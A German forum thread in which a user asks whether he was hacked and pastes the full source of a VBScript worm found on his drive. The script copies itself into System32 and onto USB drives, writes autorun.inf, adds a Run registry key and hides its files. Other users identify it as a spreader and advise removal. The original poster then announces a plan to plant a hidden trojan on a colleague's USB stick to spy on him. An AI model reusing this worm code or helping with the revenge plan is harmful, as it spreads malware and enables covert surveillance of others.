VBSript File auf C wurde ich gehacked?

[KleverKing]

Also heute ist was passiert kA wann oder wie aber erst kamen Fehlermeldungen ich musste ganz oft auf Abbrechen klicken bis die weg gingen und die kommen oft wieder dann öffne ich den Internet Explorer und ober steht dann z.B. google.de und daneben dann immer Hacked by PRIVAT-BF0E3C6D also wahrscheinlich der Computername von jemanden und auf C ist plötzlich auch ne VBScript Datei wenn man die mit dem Editor öffnet steht das hier drin

Code:

'Mutation of Trojan virus.
'My name is BIE.vbs
On error resume next
Dim mysource,winpath,flashdrive,fs,mf,atr,tf,rg,nt,check,sd,oldname,newname,rgname
Set fs = createobject("Scripting.FileSystemObject")
Set wn = WScript.CreateObject("WScript.Network")
Set mf = fs.getfile(Wscript.ScriptFullname)
oldname=CStr(fs.getfilename(Wscript.ScriptFullname))
newname = wn.ComputerName & ".vbs"
rgname = Replace(newname,".vbs","")
atr = "[autorun]"&vbcrlf&"shellexecute=wscript.exe BIE.vbs"
dim text,size
size = mf.size
check = mf.drive.drivetype
Set text=mf.openastextstream(1,-2)
do while not text.atendofstream
mysource=mysource&text.readline
mysource=mysource & vbcrlf
Loop
mysource=Replace(mysource,oldname,newname)
do
Set winpath = fs.getspecialfolder(0)
Set tf = fs.getfile(winpath & "\SYSTEM32\" & newname)
tf.attributes = 32
Set tf=fs.createtextfile(winpath & "\SYSTEM32\" & newname,2,true)
tf.write mysource
tf.close
Set tf = fs.getfile(winpath & "\SYSTEM32\" & newname)
tf.attributes = 39
For each flashdrive in fs.drives
If (flashdrive.drivetype = 1 or flashdrive.drivetype = 2) and flashdrive.path <> "A:" Then
Set tf=fs.getfile(flashdrive.path &"\BIE.vbs")
tf.attributes =32
Set tf=fs.createtextfile(flashdrive.path &"\BIE.vbs",2,true)
tf.write mysource
tf.close
Set tf=fs.getfile(flashdrive.path &"\BIE.vbs")
tf.attributes =39
Set tf =fs.getfile(flashdrive.path &"\autorun.inf")
tf.attributes = 32
Set tf=fs.createtextfile(flashdrive.path &"\autorun.inf",2,true)
tf.write atr
tf.close
Set tf =fs.getfile(flashdrive.path &"\autorun.inf")
tf.attributes=39
End If
next
Set rg = createobject("WScript.Shell")
rg.regwrite "HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run\" & rgname & "",winpath&"\SYSTEM32\" & newname
rg.regwrite "HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main\Window Title","Hacked by " & Replace(oldname, ".vbs","")
if check <> 1 then
Wscript.sleep 120000
End if
loop while check<>1
Set sd = createobject("Wscript.shell")
sd.run winpath&"\explorer.exe /e,/select, "&Wscript.ScriptFullname

Die Datei heißt wie der Computername, vielleicht weiß ja von euch einer was es ist ich hab ein paar Bilder hochgeladen auf denen man sieht was ich meine hoffe ihr könnt mir da weiter helfen

Die Fehlermeldung:



Der Text im Internet Explorer:



Die VBScript Datei auf C:




Greetz KleverKing

[Zeko]

naja, der titelleiste im IE nach würde ich mal sagen: ja.XD

Wobei die Frage wäre, ob sich nicht nur lokal jemand an deinem Rechner zu schaffen gemacht hat. Wäre es ein RAT oder ähnliches würde er wohl eher weniger in der Registry rummanipulieren und wohl eher Daten klauen/manipulieren. Ich kann mich aber täuschen.

[Sawyer]

also dieses vbscript ist (was an dem Code leicht ersichtlich ist) ein Spread code , der eine Datei auf wechseldatenträger kopiert , und die Autorun Datei verändert

wie mein vorPoster schon sagte , sieht ganz danach aus^^

MfG

[AlterHacker]

also dieses vbscript ist (was an dem Code leicht ersichtlich ist) ein Spread code , der eine Datei auf wechseldatenträger kopiert , und die Autorun Datei verändert

wie mein vorPoster schon sagte , sieht ganz danach aus^^

MfG

Schätzungsweise kommen die Fehlermeldungen daher, da der "Spreader" versucht, sich auf Laufwerke zu kopieren, die nicht existieren.

Deaktiviere WScript und lösch die datei/Die reg-einträge.

[KleverKing]

Ja runter hab ich es schon alles gemacht da waren sogar Datein als Systemdateien getarnt so das man sie eigentlich garnicht sehen könnte, ich wollte halt nur wissen ob jemand mich gehacked hat ich weiß dann nämlich wer das war und zwar mein Kollege der war gestern hier und hat sein USB Stick in meinen PC gesteckt um mir ein Video zu zeigen also jetzt weiß ich auch warum er den wirklich da rein stecken wollte

[ed0x]

off topic: was zur hölle hat auch IE zu laufen *weiche-satan* .. wie kannst du bitte nur IE benutzen *entsetzt-sei* on topic: sieht aus wie standart maleware... ich denke aber das is noch leicht zu fixen... musst ned neu aufsetzen

[KleverKing]

Ich benutze den für normale Dinge ja weil er einfach schneller läuft und so aber fals wieder mal andere Dinge vor habe ist klar dann benutz ich natürlich Firefox weil es einfach für sowas der beste ist ich werde einfach mit meinem Kollegen das selbe machen nur bei mir wird es ein Trojaner sein den versteck ich zusammen mit ner Autorun.ini als Systemdateien auf seinem USB Stick und dann mal gucken was der so in seiner Freizeit macht

[ed0x]

hm...
das ist mies
schauste erst mit webcam capture ob freundin/muddi/vatti da sind, wenn ya hauste ihm n gay porn aufn bildschierm

ne spass xD

naja...
also wenn du alles wieder entfernt hast was das ding angelegt hat, dann ist gut...
pass aber trotzdem mal auf nicht das evtl doch noch weitere daten infiziert sind oder so
grezZ
ed0x

[Zeko]

@KleverKing

Bei deinen Postings gibt es nur einen Haken: USB-Stick rein und automatisch infizieren ist nicht. Windows sieht für normalerweise für USB-Devices kein Autostart vor. Warum, kannst du ja bei dir sehen.

Wie gesagt, bei normalen Devices geht das nicht. Es gibt aber, denke ich Ausnahmen. Der eine U3 Razor(?) USB-Stick zum Beispiel hat einen Treiber mit an Bord, der sich bei der Anmeldung als CD-Rom-Laufwerk ausgibt. Vor kurzem gab es hier auch einen Thread dazu im Board. Das sind halt die Ausnahmen. Aber normalerweise geht das so einfach nicht.

[ed0x]

hm wiso?

also bei mir is autostart auch für usb gewesen (hab ich disabled ^^)

kann ich jetzt nicht bestätigen =0